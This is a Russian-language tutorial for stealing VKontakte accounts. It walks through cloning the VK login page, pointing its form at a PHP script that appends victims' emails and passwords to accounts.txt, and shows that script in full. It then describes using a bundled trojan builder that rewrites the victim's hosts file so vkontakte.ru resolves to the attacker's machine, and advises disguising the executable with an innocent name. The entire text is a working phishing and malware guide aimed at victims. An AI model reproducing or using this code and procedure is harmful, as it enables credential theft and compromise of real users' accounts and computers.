Нам потребуется:
-Установленный веб-сервер
-Фейк вконтакте
-s0VoK трой by s0
-Жертва

Все телодвижения будет происходить на локальном компе. Если же у вас есть дедик, можете использовать его(но если он у вас есть, то данная статья вам не нужна).

Устанавливаем то что душе угодно.(чистый apache, Denwer..) Я предпочитаю - http://php.spb.ru/php/install_module.html Быстро ставится, и не захламляет систему. На этой странице есть описание как его установить.

Установили? Теперь нам нужен фейк главной страницы Вконтакте. Сделать его можно так:
-Заходим на vkontakte.ru
-В броузере выбираем Файл-Сохранить как...
-Тип файла - HTML-файл с изображениями
-Открываем полученый html файл в любом текстовом редакторе.
-Ищем строку <form
-Ищем параметр action
-Заменяем все что между ковычками action=" ", на login.php. В итоге имеем action="login.php"
-Ищем <span class="ncc"><a href="javascript:quick_login()">Вход</a></span>
-Меняем на <span class="ncc"><a href="javascript:login.submit()">Вход</a></span>
-Переименовываем его в index.php

Было <form method="post" name="login" id="login" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
Стало <form method="post" name="login" id="login" action="login.php" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">

Теперь создаем файл login.php и в него пишем:

<?php
$fname = "accounts.txt"; //Файл куда будем сохранять полученные данные
//Получаем данные
$email = $HTTP_POST_VARS['email'];
$password = $HTTP_POST_VARS['pass'];

$data = $email."-".$password."\r\n";  //Формируем строку для записи в файл
$fp = fopen($fname, "a+") or die("Can not open file"); //Открываем файл
fwrite($fp, $data);	//Пишем в файл
fclose($fp);	//Закрываем файл
Header("Location:vk_login.php"); //Перекидываем юзера на ошибку
?>

vk_login.php - это тот-же index.php, только с текстом о том, что логин-пароль не верны, либо что сервак вконтакте лежит, и пусть попробуют залогинится позже. В общем все на ваш вкус. Сохраняем все это, и кидаем в папку www1(если вы установили сервер от php.spb.ru) Запускаем apache.exe

-Запускаем s0Vok.exe
-В поле IP Address указываем ваш внешний IP(узнать можно на 2ip.ru
-жмем Create Me
-Получаем файл run_me.exe, не зубудье его переименовать во что-нибудь нормальное(на подобии SuperRatioVKMaster.exe)

Теперь передаем жертве полученый exe файл, и ждем пока она зайдет к вам на страничку, и введет свои данные. Получить вы их сможете в файле accounts.txt

В архиве к статье:
s0VoK.exe - билдер троя
editme.bin - трой
Папка vk - то что мы делали выше, фейк вконтакте

Q - Почему мы используем наш компьютер, а не заливаем фейк на фрихостинг?
A - В файле hosts можно указать только IP адресс, таким образом мы не сможем сделать переадресацию на фрихостинг

Q - У меня ничего не работает
A - Се ля ви, ничем не могу помочь

Q - Как закинуть трояна жертве?
A - По проводам

Q - Жертва запустила файл, но у нее открывается оригинальный вконтакте.ру
A - Возможно у учетки жертвы нет прав на изменение файла hosts